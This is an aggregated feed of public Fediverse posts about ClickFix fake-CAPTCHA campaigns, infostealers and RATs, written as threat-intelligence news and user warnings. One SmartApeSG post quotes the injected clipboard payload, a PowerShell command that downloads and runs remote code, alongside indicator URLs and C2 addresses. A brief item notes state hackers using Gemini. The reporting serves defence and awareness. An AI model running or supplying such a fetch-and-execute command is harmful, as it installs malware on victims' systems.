#clickfix — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #clickfix, aggregated by home.social.
-
New.
ReliaQuest: ClickFix Evolves with PySoxy Proxying https://reliaquest.com/blog/threat-spotlight-clickfix-evolves-with-pysoxy-proxying/
More:
Infosecurity-Magazine: Attackers Combine ClickFix With PySoxy Proxying to Maintain Persistence https://www.infosecurity-magazine.com/news/clickfix-combined-pysoxy-proxying/ #infosec #Clickfix #threatresearch
-
'ClickFix' attack tricks users into hacking themselves, ACSC warns:
"Verify that you are human" prompt used to deliver Vidar Stealer malware.
The Australian Cyber Security Centre (ACSC) has stepped in to warn users of an active attack campaign targeting Windows users with Vidar Stealer malware, which is delivered through the so-called ClickFix social engineering technique.
#clickfix #acsc #malware #vidar #stealing #VidarStealer #australia #socialengineering
-
Microsoft researchers warn of a new #ClickFix campaign targeting macOS with fake guides on Medium and Craft to deploy AMOS and SHub Stealer via Terminal commands.
Read: https://hackread.com/fake-macos-troubleshooting-sites-steal-icloud-clickfix/
-
You visit the juwenalia (student festival) website… and find this surprise [possible malware infection]
Patryk sent us information about an infection of the site rzeszowskiejuwenalia[.]pl. Our reader visited the site and came across this view: The image alone does not reveal much yet, but… after clicking, the page asked the user to press, in order, the keys Windows+R, Ctrl+V and Enter. What is technically going on here? After clicking "I'm not a robot", the page...
#WBiegu #Awareness #Clickfix #Infekcja #Malware #Socjotechnika
https://sekurak.pl/wchodzisz-na-strone-juwenaliow-a-tu-taka-niespodzianka-mozliwa-infekcja-malware/
-
ClickFix campaign uses fake macOS utilities lures to deliver infostealers - https://www.redpacketsecurity.com/clickfix-campaign-uses-fake-macos-utilities-lures-to-deliver-infostealers/
#threatintel
#macos
#clickfix
#infostealer
#payload-delivery
#persistence
-
2026-04-27 (Monday):
Example of #SmartApeSG URLs for fake CAPTCHA/human verification page:
- hxxps[:]//datanexlab[.]top/trace/audit-module.js
- hxxps[:]//datanexlab[.]top/trace/refresh-css.php?hZ5akaYM
- hxxps[:]//datanexlab[.]top/trace/alias-thread.js?78a6eb157b4ca38e45
#ClickFix script injected into clipboard:
powershell -c iex(irm 216.120.201[.]116 -UseBasicParsing)
Traffic leading to #RAT payload:
- hxxp[:]//216.120.201[.]116/
- hxxp[:]//104.225.129[.]105/
- hxxps[:]//truebasecore[.]com/io
Zip archive with package for RAT payload:
- SHA256 hash: 5a30867937f1e2f714c8b398436135c63c164267602cc66a5adb5b4c2ed55365
#RAT payload C2 traffic:
- tcp[:]//89.110.110[.]119:443/
-
📢⚠️ New version of Vidar infostealer spreads via fake CAPTCHA, hides in JPEG and TXT files, uses fileless attacks, and steals browser and crypto wallet data.
Read: https://hackread.com/vidar-infostealer-fake-captchas-jpeg-txt-files/
-
Last Week on My Mac: Didn’t macOS have a GUI?
-
2026-04-23 (Thursday): #SmartApeSG campaign using #ClickFix instructions to push some sort of #RAT.
I'm still not sure what this #malware is yet, but it looks like a RAT.
Details, some more images, and a #pcap of the traffic are available at https://www.malware-traffic-analysis.net/2026/04/23/index.html
-
macOS ClickFix Attacks Harvest Credentials via AppleScript Stealers
macOS users beware: a sneaky ClickFix campaign is using AppleScript stealers to harvest credentials from 14 browsers, 16 cryptocurrency wallets, and over 200 extensions. This targeted attack has already made off with a staggering amount of sensitive info - and it's still on the loose.
#Macos #Clickfix #Applescript #Infostealer #CredentialHarvesting
-
Last Week on My Mac: Root cause analysis and ClickFix
-
Hunting Emmenhtal: how we reconstructed the full kill chain of a banking trojan from a reformatted disk
We walk through a real IR case: ClickFix → Emmenhtal Loader → banking trojan with Telegram C2. Forensics of a reformatted 930 GB disk, VDM disambiguation of false positives, and recovery of artifacts from the hibernation file.
https://habr.com/ru/articles/1021698/
#DFIR #форензика #malware_analysis #банковский_троян #Emmenhtal #ClickFix #threat_hunting #YARA #fileless_malware #incident_response
-
Researchers at Jamf Threat report today on a new variant of a known cyberattack method. The attack targets Mac users and uses a fairly clever deception to smuggle malware onto the Mac.
More: https://digiprax.maniabel.work/archiv/1248
#infostealer #AtomicStealer #jamf #infosec #up2date #macOS #ScriptEditor #ClickFix
-
2026-04-06 (Monday): #ClickFix activity from the #SmartApeSG campaign. Not sure what malware was sent through the fake CAPTCHA page this time, but it's not the usual.
A list of indicators, a #pcap of the traffic, malware samples and other files/info are available at https://malware-traffic-analysis.net/2026/04/06/index.html
-
Beware CAPTCHA Scam
Fake "I'm not a robot" prompt tricks you. Don't press Win+R for ANY verification EVER!
Real CAPTCHA never asks to run commands or paste code. If "extra verification" has keyboard steps close the tab IMMEDIATELY! Stay safe!
-
Well, a nice find for hunting season 👀
A new, very visual evolution of #ClickFix, which this time relies on WebDAV to deliver the payload. (!)
It makes a change from the usual direct PowerShell / MSHTA / WScript chains: here, initial access goes through net use, mounting the remote share, running the batch file as if it were a local file, then unmounting.
Target: Windows only.
The move is interesting: less dependence on heavily monitored interpreters/LOLBins, and an abuse of WebDAV that can pass more quietly if it is not monitored.
Source of the finding: Daniel
👇
https://www.linkedin.com/posts/daniel-b1_clickfix-webdav-atos-ugcPost-7441043660613398528-98ey
Atos analysis
👇
https://atos.net/en/lp/cybershield/investigating-a-new-click-fix-variant
For those who want to enrich detection / blocking:
the little list to kill off in your firewalls and DNS filters
👇
https://threatfox.abuse.ch/browse/tag/WebDav/
And as a bonus: a hunting recipe / pivot, as an image, via #Onyphe.
-
New variant of the ClickFix method: cybercriminals drop Win+R in favor of Win+X and Windows Terminal
Security researchers from Microsoft Defender warn of a new variant of a malware campaign in which cybercriminals use phishing to persuade users to install infostealer malware (Lumma Stealer). The attack relies on the ClickFix technique, which consists of convincing the user to run malicious PowerShell commands. TLDR: The attack scheme is fairly simple. Using social engineering...
#Aktualności #Clickfix #LummaStealer #Microsoft #Windows #WindowsDefender
-
ISC diary: #SmartApeSG campaign uses #ClickFix page to push #Remcos #RAT (#RemcosRAT) https://isc.sans.edu/diary/32796
-
A 'Free Photoshop' scam on #TikTok is stealing people's data: https://zorz.it/OABup
#JeremyGray #FreePhotoshop #AdobePhotoshop #ClickFix #CyberCriminals #Microsoft #Photoshop #scam #SocialMedia
-
Another installment of ClickFix: this time it impersonates Cloudflare
Content: ClickFix is a social engineering attack that persuades users to run malicious commands on their own devices. A few days ago users of the site psychologiadziecka[.]org were attacked this way, though we warned about the first attacks of this kind back in 2024. TLDR: Most campaigns follow a similar pattern: the user is shown a fake (but...
#Aktualności #Teksty #CAPTCHA #Clickfix #Cloudflare #Malware
https://sekurak.pl/kolejna-odslona-clickfix-tym-razem-podszywa-sie-pod-cloudflare/
-
📬 ClickFix malware campaign: fake Cloudflare check silently installs MIMICRAT
#ITSicherheit #Malware #AMSIBypass #ClickFix #ETWBypass #FilelessMalware #MIMICRAT #PowerShell #ReflectiveLoading #RemoteAccessTrojaner #socialengineering #WindowsMalware https://sc.tarnkappe.info/0dde49
-
📬 Google sees state hackers using Gemini in the preparation phase
#Cyberangriffe #KünstlicheIntelligenz #ClickFix #COINBAIT #Gemini #HONESTCUE #OSINT #Staatshacker #UNC2970 https://sc.tarnkappe.info/23b4e2